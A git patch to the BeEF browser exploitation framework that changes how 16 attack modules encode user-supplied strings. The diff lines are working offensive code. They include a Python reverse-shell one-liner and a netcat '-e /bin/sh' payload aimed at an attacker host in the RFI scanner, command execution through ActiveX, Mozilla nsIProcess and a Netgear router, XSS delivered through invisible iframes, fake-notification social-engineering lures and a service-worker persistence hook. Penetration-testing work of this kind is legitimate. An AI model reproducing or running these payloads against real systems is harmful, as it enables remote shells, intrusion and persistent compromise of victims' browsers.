From f545b3631bde67d5c35ff52e053c1711c62c4b60 Mon Sep 17 00:00:00 2001
From: Brendan Coles <bcoles@gmail.com>
Date: Fri, 11 Aug 2017 05:44:32 +0000
Subject: [PATCH] Replace gsub quotes with base64 encoding

---
 modules/debug/test_beef_debug/command.js                        | 2 +-
 .../exploits/local_host/activex_command_execution/command.js    | 2 +-
 .../exploits/local_host/mozilla_nsiprocess_interface/command.js | 2 +-
 .../exploits/local_host/mozilla_nsiprocess_interface/module.rb  | 2 +-
 modules/exploits/rfi_scanner/module.rb                          | 2 +-
 modules/exploits/router/netgear_dgn2200_cmd_exec/command.js     | 2 +-
 modules/exploits/xss/alienvault_ossim_3.1_xss/command.js        | 2 +-
 .../exploits/xss/cisco_collaboration_server_5_xss/command.js    | 2 +-
 modules/exploits/xss/serendipity_1.6_xss/command.js             | 2 +-
 modules/exploits/xss/sqlitemanager_xss/command.js               | 2 +-
 modules/misc/blockui/command.js                                 | 2 +-
 modules/persistence/jsonp_service_worker/command.js             | 2 +-
 modules/social_engineering/fake_notification/command.js         | 2 +-
 modules/social_engineering/fake_notification_c/command.js       | 2 +-
 modules/social_engineering/fake_notification_ff/command.js      | 2 +-
 modules/social_engineering/fake_notification_ie/command.js      | 2 +-
 16 files changed, 16 insertions(+), 16 deletions(-)

diff --git a/modules/debug/test_beef_debug/command.js b/modules/debug/test_beef_debug/command.js
index 9066a327b..63040720b 100644
--- a/modules/debug/test_beef_debug/command.js
+++ b/modules/debug/test_beef_debug/command.js
@@ -7,7 +7,7 @@
 beef.execute(function() {
 
 	try {
-		var msg = decodeURIComponent(beef.encode.base64.decode('<%= Base64.encode64(@msg).delete("\n") %>'));
+		var msg = decodeURIComponent(beef.encode.base64.decode('<%= Base64.strict_encode64(@msg) %>'));
 		beef.debug(msg);
 		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=called the beef.debug() function. Check the developer console for your debug message.');
 	} catch(e) {
diff --git a/modules/exploits/local_host/activex_command_execution/command.js b/modules/exploits/local_host/activex_command_execution/command.js
index 8d2afeca2..b286eb190 100755
--- a/modules/exploits/local_host/activex_command_execution/command.js
+++ b/modules/exploits/local_host/activex_command_execution/command.js
@@ -6,7 +6,7 @@
 
 beef.execute(function() {
 
-	var cmd = '<%= @cmd.gsub(/'/, "\\'") %>';
+	var cmd = beef.encode.base64.decode('<%= Base64.strict_encode64(@cmd) %>');
 	var result = "command was not sent";
 
 	try {
diff --git a/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js b/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js
index 999ed1899..c3264978b 100644
--- a/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js
+++ b/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js
@@ -9,7 +9,7 @@ beef.execute(function() {
 	var result = "command sent";
 
 	try {
-		var command_str = "<%= command_str.gsub!(/"/, '\\"') %>";
+		var command_str = beef.encode.base64.decode('<%= Base64.strict_encode64(@command_str) %>');
 		var getWorkingDir= Components.classes["@mozilla.org/file/directory_service;1"].getService(Components.interfaces.nsIProperties).get("Home",Components.interfaces.nsIFile);
 		var lFile = Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
 		var lPath = "C:\\WINDOWS\\system32\\cmd.exe"; // maybe "%WINDIR%\\system32\\cmd.exe" would work?
diff --git a/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb b/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb
index 6a545f6b3..0d6f5314b 100644
--- a/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb
+++ b/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb
@@ -9,7 +9,7 @@ class Mozilla_nsiprocess_interface < BeEF::Core::Command
 
 	def self.options
 		return [
-			{'name' => 'ports', 'ui_label' => 'Windows Command', 'value' => 'ping localhost'}
+			{'name' => 'command_str', 'ui_label' => 'Windows Command', 'value' => 'ping localhost'}
 		]
 	end
 
diff --git a/modules/exploits/rfi_scanner/module.rb b/modules/exploits/rfi_scanner/module.rb
index f70319d5e..c8cf7a145 100644
--- a/modules/exploits/rfi_scanner/module.rb
+++ b/modules/exploits/rfi_scanner/module.rb
@@ -20,7 +20,7 @@ class Rfi_scanner < BeEF::Core::Command
 			if input['name'] == 'payload'
 				case input['value']
 				when "reverse_python" # msfvenom -p cmd/unix/reverse_python LHOST=X.X.X.X LPORT=XXXX
-					cmd = Base64.encode64("import socket,subprocess,os;host='#{lhost}';port=#{lport};s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);").gsub(/\r?\n/, '')
+					cmd = Base64.strict_encode64("import socket,subprocess,os;host='#{lhost}';port=#{lport};s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);")
 					payload = "`python -c \"exec ('#{cmd}'.decode ('base64') )\"`"
 				when "reverse_netcat"
 					payload = "`nc #{lhost} #{lport} -e /bin/sh`"
diff --git a/modules/exploits/router/netgear_dgn2200_cmd_exec/command.js b/modules/exploits/router/netgear_dgn2200_cmd_exec/command.js
index 316ec4fff..a2cf8f8ed 100755
--- a/modules/exploits/router/netgear_dgn2200_cmd_exec/command.js
+++ b/modules/exploits/router/netgear_dgn2200_cmd_exec/command.js
@@ -7,7 +7,7 @@
 beef.execute(function() {
 
 	var rhost = '<%= @rhost %>'; 
-	var cmd = '<%= Base64.encode64(@cmd).delete("\n") %>';
+	var cmd = '<%= Base64.strict_encode64(@cmd) %>';
 	var timeout = 15;
 
 	var netgear_dgn2200_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
diff --git a/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js b/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js
index 94bb2d746..f3f1fa34d 100644
--- a/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js
+++ b/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js
@@ -6,7 +6,7 @@
 
 beef.execute(function() {
 
-	var uri = '<%= @uri.gsub(/'/, "\\'") %>'; 
+	var uri = beef.encode.base64.decode('<%= Base64.strict_encode64(@uri) %>');
 
 	var alienvault_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
 	alienvault_iframe_<%= @command_id %>.setAttribute('src', uri);
diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js b/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js
index 9dc7cc5a2..03f1f5126 100644
--- a/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js
+++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js
@@ -6,7 +6,7 @@
 
 beef.execute(function() {
 
-	var uri = '<%= @uri.gsub(/'/, "\\'") %>'; 
+	var uri = beef.encode.base64.decode('<%= Base64.strict_encode64(@uri) %>');
 
 	var cisco_collaboration_iframe = beef.dom.createInvisibleIframe();
 	cisco_collaboration_iframe.setAttribute('src', uri);
diff --git a/modules/exploits/xss/serendipity_1.6_xss/command.js b/modules/exploits/xss/serendipity_1.6_xss/command.js
index 7b9734c7d..959e9af70 100644
--- a/modules/exploits/xss/serendipity_1.6_xss/command.js
+++ b/modules/exploits/xss/serendipity_1.6_xss/command.js
@@ -6,7 +6,7 @@
 
 beef.execute(function() {
 
-	var uri = '<%= @uri.gsub(/'/, "\\'") %>'; 
+	var uri = beef.encode.base64.decode('<%= Base64.strict_encode64(@uri) %>');
 
 	var serendipity_iframe = beef.dom.createInvisibleIframe();
 	serendipity_iframe.setAttribute('src', uri);
diff --git a/modules/exploits/xss/sqlitemanager_xss/command.js b/modules/exploits/xss/sqlitemanager_xss/command.js
index 7b9734c7d..959e9af70 100644
--- a/modules/exploits/xss/sqlitemanager_xss/command.js
+++ b/modules/exploits/xss/sqlitemanager_xss/command.js
@@ -6,7 +6,7 @@
 
 beef.execute(function() {
 
-	var uri = '<%= @uri.gsub(/'/, "\\'") %>'; 
+	var uri = beef.encode.base64.decode('<%= Base64.strict_encode64(@uri) %>');
 
 	var serendipity_iframe = beef.dom.createInvisibleIframe();
 	serendipity_iframe.setAttribute('src', uri);
diff --git a/modules/misc/blockui/command.js b/modules/misc/blockui/command.js
index 535cd9dbf..1d9219b7e 100644
--- a/modules/misc/blockui/command.js
+++ b/modules/misc/blockui/command.js
@@ -8,7 +8,7 @@ beef.execute(function() {
   var timeout = '<%= @timeout %>' * 1000;
 
   var blockui = function() {
-    $j.blockUI({ message: decodeURIComponent(beef.encode.base64.decode('<%= Base64.encode64(@message).delete("\n") %>')) });
+    $j.blockUI({ message: decodeURIComponent(beef.encode.base64.decode('<%= Base64.strict_encode64(@message) %>')) });
     setTimeout("$j.unblockUI();", <%= @timeout %> * 1000);
   }
 
diff --git a/modules/persistence/jsonp_service_worker/command.js b/modules/persistence/jsonp_service_worker/command.js
index 5da2b78fc..d6c0f4f7d 100644
--- a/modules/persistence/jsonp_service_worker/command.js
+++ b/modules/persistence/jsonp_service_worker/command.js
@@ -7,7 +7,7 @@
 beef.execute(function() {
   var scriptElem = document.createElement("script");
   var hook = encodeURIComponent(beef.net.hook);
-  var tempBody = encodeURIComponent('<%= @tempBody.gsub(/'/, "\\'") %>');
+  var tempBody = encodeURIComponent(beef.encode.base64.decode('<%= Base64.strict_encode64(@tempBody) %>');
   scriptElem.innerHTML = 'navigator.serviceWorker.register("<%=@JSONPPath%>onfetch%3Dfunction(e)%7B%0Aif(!(e.request.url.indexOf(%27'+beef.net.httpproto+'%3A%2F%2F'+beef.net.host+'%3A'+beef.net.port+'%27)>=0))%0Ae.respondWith(new%20Response(%27'+tempBody+'%3Cscript%20src%3D%5C%27'+beef.net.httpproto+'%3A%2F%2F'+beef.net.host+'%3A'+beef.net.port+hook+'%5C%27%20type%3D%5C%27text%2Fjavascript%5C%27%3E%3C%2Fscript%3E%27%2C%7Bheaders%3A%20%7B%27Content-Type%27%3A%27text%2Fhtml%27%7D%7D))%0Aelse%0Ae.fetch(e.request)%0A%7D%2F%2F")';
   $j("body").append(scriptElem);
   beef.net.send("<%= @command_url %>", <%=@command_id%>, "result=Script element inserted within the body, domain for the browser permanently compromized if everything went as expected.");
diff --git a/modules/social_engineering/fake_notification/command.js b/modules/social_engineering/fake_notification/command.js
index 48019c90a..1a88b18b1 100644
--- a/modules/social_engineering/fake_notification/command.js
+++ b/modules/social_engineering/fake_notification/command.js
@@ -17,7 +17,7 @@ beef.execute(function() {
 	var hid = '#'+id;
 	var hpid = '#'+pid;
 	$j(hid).append(elp);
-	$j(hpid).html(decodeURIComponent(beef.encode.base64.decode('<%= Base64.encode64(@notification_text).delete("\n") %>')));
+	$j(hpid).html(decodeURIComponent(beef.encode.base64.decode('<%= Base64.strict_encode64(@notification_text) %>')));
 	$j(hid).append(ell);
 	$j(hid).append(elr);
 	$j(hid).click(function() {
diff --git a/modules/social_engineering/fake_notification_c/command.js b/modules/social_engineering/fake_notification_c/command.js
index 6cb2010cb..a3995ba48 100644
--- a/modules/social_engineering/fake_notification_c/command.js
+++ b/modules/social_engineering/fake_notification_c/command.js
@@ -17,7 +17,7 @@ beef.execute(function() {
 	var hid = '#'+id;
 	var hpid = '#'+pid;
 	$j(hid).append(elp);
-	$j(hpid).html(decodeURIComponent(beef.encode.base64.decode('<%= Base64.encode64(@notification_text).delete("\n") %>')));
+	$j(hpid).html(decodeURIComponent(beef.encode.base64.decode('<%= Base64.strict_encode64(@notification_text) %>')));
 	$j(hid).append(ell);
 	$j(hid).append(elr);
 	$j(hid).click(function() {
diff --git a/modules/social_engineering/fake_notification_ff/command.js b/modules/social_engineering/fake_notification_ff/command.js
index 24d2ccb47..b0221ecc4 100644
--- a/modules/social_engineering/fake_notification_ff/command.js
+++ b/modules/social_engineering/fake_notification_ff/command.js
@@ -17,7 +17,7 @@ beef.execute(function() {
 	var hid = '#'+id;
 	var hpid = '#'+pid;
 	$j(hid).append(elp);
-	$j(hpid).html(decodeURIComponent(beef.encode.base64.decode('<%= Base64.encode64(@notification_text).delete("\n") %>'))+"&nbsp;<img style='padding:0; margin:5px; position: absolute; top: 0;' src='data:image/png;base64,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'>");
+	$j(hpid).html(decodeURIComponent(beef.encode.base64.decode('<%= Base64.strict_encode64(@notification_text) %>'))+"&nbsp;<img style='padding:0; margin:5px; position: absolute; top: 0;' src='data:image/png;base64,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'>");
 	$j(hid).append(ell);
 	//$j(hid).append("<u>Problems installing?</u>&nbsp;");
 	$j(hid).append(elr);
diff --git a/modules/social_engineering/fake_notification_ie/command.js b/modules/social_engineering/fake_notification_ie/command.js
index 1d7e143f2..6b9dbf985 100644
--- a/modules/social_engineering/fake_notification_ie/command.js
+++ b/modules/social_engineering/fake_notification_ie/command.js
@@ -17,7 +17,7 @@ beef.execute(function() {
 	var hid = '#'+id;
 	var hpid = '#'+pid;
 	$j(hid).append(elp);
-	$j(hpid).html(decodeURIComponent(beef.encode.base64.decode('<%= Base64.encode64(@notification_text).delete("\n") %>')));
+	$j(hpid).html(decodeURIComponent(beef.encode.base64.decode('<%= Base64.strict_encode64(@notification_text) %>')));
 	$j(hid).append(ell);
 	$j(hid).append(elr);
 	$j(hid).click(function() {